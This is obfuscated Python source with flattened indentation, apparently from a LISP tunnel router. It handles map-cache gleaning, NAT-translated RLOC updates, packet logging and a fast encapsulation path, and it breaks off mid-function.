I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global O0ooo00OOo00
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
O0ooo00OOo00 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global O0ooo00OOo00
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , O0ooo00OOo00 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in list ( kv_pair . keys ( ) ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OOO . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1OOO
if 59 - 59: II111iiii + OoooooooOO * OoOoOO00 + i1IIi
if ( O0o0 == "rloc-prefix" ) :
Oo0OoO00oOO0o = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Oo0OoO00oOO0o . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = Oo0OoO00oOO0o
if 80 - 80: oO0o + OOooOOo - OOooOOo % iII111i
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 63 - 63: I1IiiI - I1ii11iIi11i + O0 % I11i / iIii1I11I1II1 / o0oOOo0O0Ooo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
for o000O0o in lisp . lisp_glean_mappings :
if ( ( "eid-prefix" in o000O0o ) ^ ( "eid-prefix" in oO0Oo ) ) : continue
if ( ( "eid-prefix" in o000O0o ) and ( "eid-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "eid-prefix" ]
oO0OOoo0OO = oO0Oo [ "eid-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( ( "group-prefix" in o000O0o ) ^ ( "group-prefix" in oO0Oo ) ) : continue
if ( ( "group-prefix" in o000O0o ) and ( "group-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "group-prefix" ]
oO0OOoo0OO = oO0Oo [ "group-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 91 - 91: IiII
if 15 - 15: II111iiii
if ( ( "rloc-prefix" in o000O0o ) ^ ( "rloc-prefix" in oO0Oo ) ) : continue
if ( ( "rloc-prefix" in o000O0o ) and ( "rloc-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "rloc-prefix" ]
oO0OOoo0OO = oO0Oo [ "rloc-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if ( ( "instance-id" in o000O0o ) ^ ( "instance-id" in oO0Oo ) ) : continue
if ( ( "instance-id" in o000O0o ) and ( "instance-id" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "instance-id" ]
oO0OOoo0OO = oO0Oo [ "instance-id" ]
if ( iI1iII1 != oO0OOoo0OO ) : continue
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
return
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
lisp . lisp_glean_mappings . append ( oO0Oo )
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
def iiii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
def oo0o00O ( mc , parms ) :
o00O0OoO , Oo0OoO00oOO0o , i1I , OoOO = parms
if 53 - 53: Oo0Ooo
iI1Iii = "{}:{}" . format ( Oo0OoO00oOO0o . print_address_no_iid ( ) , i1I )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
oO00OOoO00 = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( OoOO , lisp . red ( iI1Iii , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
for i1I1iI1iIi111i in mc . rloc_set :
if ( i1I1iI1iIi111i . rle ) :
for iiIi1IIi1I in i1I1iI1iIi111i . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name != OoOO ) : continue
iiIi1IIi1I . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
o0OoOO000ooO0 = iiIi1IIi1I . address . print_address_no_iid ( ) + ":" + str ( iiIi1IIi1I . translated_port )
if 56 - 56: iII111i
lisp . lprint ( oO00OOoO00 . format ( "RLE" , o0OoOO000ooO0 ) )
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if ( i1I1iI1iIi111i . rloc_name != OoOO ) : continue
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
o0OoOO000ooO0 = i1I1iI1iIi111i . rloc . print_address_no_iid ( ) + ":" + str ( i1I1iI1iIi111i . translated_port )
if 62 - 62: OOooOOo + O0
if ( o0OoOO000ooO0 in lisp . lisp_crypto_keys_by_rloc_encap ) :
oO0OOOO0 = lisp . lisp_crypto_keys_by_rloc_encap [ o0OoOO000ooO0 ]
lisp . lisp_crypto_keys_by_rloc_encap [ iI1Iii ] = oO0OOOO0
if 26 - 26: Ii1I
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
i1I1iI1iIi111i . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1I1iI1iIi111i . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
i1I1iI1iIi111i . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( oO00OOoO00 . format ( "RLOC" , o0OoOO000ooO0 ) )
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if ( lisp . lisp_rloc_probing ) :
o00oO0oo0OO = None if ( mc . group . is_null ( ) ) else mc . eid
O0O0OOOOoo = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( o00O0OoO , 0 , o00oO0oo0OO , O0O0OOOOoo , i1I1iI1iIi111i )
if 74 - 74: I1ii11iIi11i + II111iiii / OoO0O00
if 100 - 100: OoOoOO00 * iIii1I11I1II1
if 86 - 86: OoO0O00 * OOooOOo . iII111i
if 32 - 32: o0oOOo0O0Ooo . IiII * I11i
if 93 - 93: o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
def ii1111iII ( mc , parms ) :
if 32 - 32: i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if ( mc . group . is_null ( ) ) : return ( oo0o00O ( mc , parms ) )
if 97 - 97: O0 + OoOoOO00
if ( mc . source_cache == None ) : return ( True , parms )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( oo0o00O , parms )
return ( True , parms )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
def OooOo0ooo ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( ii1111iII ,
[ sockets , rloc , port , hostname ] )
return
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
def I1II1 ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 86 - 86: iIii1I11I1II1 / OoOoOO00 . II111iiii
if ( sred in [ "Send" , "Receive" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] ,
II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] , II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ,
# I1IiiI
II1i111Ii1i [ 40 : 48 ] , II1i111Ii1i [ 48 : 56 ] , II1i111Ii1i [ 56 : 64 ] , II1i111Ii1i [ 64 : 72 ] ) )
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
def o0OOOoO0 ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 73 - 73: I11i % i11iIiiIii - I1IiiI
Ii1iI111II1I1 = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , Ii1iI111II1I1 ) )
if 91 - 91: OOooOOo % OOooOOo - I1IiiI
if 18 - 18: I11i - i11iIiiIii / II111iiii . OOooOOo
if 55 - 55: i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
def OO0000o ( ts , msg ) :
global I1I11I1I1I
if 42 - 42: Oo0Ooo
if ( I1I11I1I1I == False ) : return ( None )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if ( ts == None ) : return ( time . time ( ) )
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
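# (obfuscated helper) pack a 4-byte string into a 32-bit integer, big-endian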
def Oo0o0O00 ( a ) :
ii1 = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( ii1 )
if 39 - 39: Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * iII111i + I1IiiI
if 77 - 77: Ii1I + II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
if 41 - 41: Oo0Ooo
if 10 - 10: Oo0Ooo / Oo0Ooo / I1Ii111 . I1Ii111
if 98 - 98: Oo0Ooo / I1IiiI . O0 + OoO0O00
if 43 - 43: II111iiii . oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
iI1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
IiI = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: OoO0O00 + I1IiiI % I1IiiI
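# (obfuscated) fast data-plane path, used when LISP_RTR_FAST_DATA_PLANE is set:
# decapsulate, look up the map-cache, re-encapsulate, and forward entirely within this function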
def oO0o0oooO0oO ( packet ) :
global lisp_map_cache , o0oOoO00o
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
Iii1iiIi1II = OO0000o ( None , "Fast" )
if 60 - 60: I1IiiI - oO0o * I11i % II111iiii
if 62 - 62: iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
iii11I = 0
I1Iii1 = None
if ( packet [ 9 : 10 ] == b'\x11' ) :
if ( packet [ 20 : 22 ] == b'\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == b'\x10\xf6' ) : return ( False )
if 30 - 30: OoooooooOO - OoOoOO00
if ( packet [ 20 : 22 ] == b'\x10\xf5' or packet [ 22 : 24 ] == b'\x10\xf5' ) :
I1Iii1 = packet [ 12 : 16 ]
iii11I = packet [ 32 : 35 ]
iii11I = ord ( iii11I [ 0 ] ) << 16 | ord ( iii11I [ 1 ] ) << 8 | ord ( iii11I [ 2 ] )
if ( iii11I == 0xffffff ) : return ( False )
I1II1 ( "Decap" , packet )
packet = packet [ 36 : : ]
if 75 - 75: iIii1I11I1II1 - Ii1I . Oo0Ooo % i11iIiiIii % I11i
if 55 - 55: iII111i . II111iiii % OoO0O00 * iII111i + ooOoO0o + Ii1I
if 24 - 24: Oo0Ooo - oO0o % iIii1I11I1II1 . i1IIi / O0
I1II1 ( "Receive" , packet )
if 36 - 36: I1IiiI - I11i
if 29 - 29: ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
I1ii11 = Oo0o0O00 ( packet [ 16 : 20 ] )
IiI . instance_id = iii11I
IiI . address = I1ii11
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if ( ( I1ii11 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
if 24 - 24: i11iIiiIii % iIii1I11I1II1 + OOooOOo / i11iIiiIii
if 70 - 70: OoO0O00 * O0 . I11i + I1IiiI . IiII
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - OoO0O00 - I11i
I1ii11 = IiI
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
if ( I1Iii1 != None ) :
OOO0oOOoo = Oo0o0O00 ( packet [ 12 : 16 ] )
iI1 . instance_id = iii11I
iI1 . address = OOO0oOOoo
oOOO00o000o = lisp . lisp_map_cache . lookup_cache ( iI1 , False )
if ( oOOO00o000o == None ) :
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI1 , None ,
None )
if ( iIi11i1 ) : return ( False )
elif ( oOOO00o000o . gleaned ) :
I1Iii1 = Oo0o0O00 ( I1Iii1 )
if ( oOOO00o000o . rloc_set [ 0 ] . rloc . address != I1Iii1 ) : return ( False )
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
o00oo0 . add_recent_source ( iI1 )
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION and
o00oo0 . eid . instance_id == 0 ) :
I1ii11 . instance_id = lisp . lisp_default_secondary_iid
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if ( o00oo0 . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( o00oo0 . best_rloc_set == [ ] ) : return ( False )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
I1ii11 = o00oo0 . best_rloc_set [ 0 ]
if ( I1ii11 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 45 - 45: I1Ii111
iii11I = o00oo0 . eid . instance_id
i1I = I1ii11 . translated_port
oO = I1ii11 . stats
I1ii11 = I1ii11 . rloc
IIi1iiii1iI = I1ii11 . address
I1Iii1 = lisp . lisp_myrlocs [ 0 ] . address
if 25 - 25: I1ii11iIi11i + O0
if 28 - 28: OoooooooOO
if 89 - 89: iII111i - ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo - I1IiiI / IiII / O0 % o0oOOo0O0Ooo * Ii1I
OOo = b'\x45\x00'
O0II11iI111i1 = len ( packet ) + 20 + 8 + 8
OOo += bytes ( [ ( O0II11iI111i1 >> 8 ) & 0xff , O0II11iI111i1 & 0xff ] )
OOo += b'\xff\xff\x40\x00\x10\x11\x00\x00'
OOo += bytes ( [ ( I1Iii1 >> 24 ) & 0xff , ( I1Iii1 >> 16 ) & 0xff ,
( I1Iii1 >> 8 ) & 0xff , I1Iii1 & 0xff ] )
OOo += bytes ( [ ( IIi1iiii1iI >> 24 ) & 0xff , ( IIi1iiii1iI >> 16 ) & 0xff ,
( IIi1iiii1iI >> 8 ) & 0xff , IIi1iiii1iI & 0xff ] )
OOo = lisp . lisp_ip_checksum ( OOo )
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = O0II11iI111i1 - 20
o000oOoo0o000 = b'\xff\x00' if ( i1I == 4341 ) else b'\x10\xf5'
o000oOoo0o000 += bytes ( [ ( i1I >> 8 ) & 0xff , i1I & 0xff ] )
o000oOoo0o000 += bytes ( [ ( O0O0Ooooo000 >> 8 ) & 0xff , O0O0Ooooo000 & 0xff ] ) + b'\x00\x00'
o000oOoo0o000 += b'\x08\xdf\xdf\xdf'
o000oOoo0o000 += bytes ( [ ( iii11I >> 16 ) & 0xff , ( iii11I >> 8 ) & 0xff , iii11I & 0xff ] )
o000oOoo0o000 += b'\x00'
if 40 - 40: i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - I11i . i1IIi
if 99 - 99: O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
packet = OOo + o000oOoo0o000 + packet
I1II1 ( "Encap" , packet )
else :
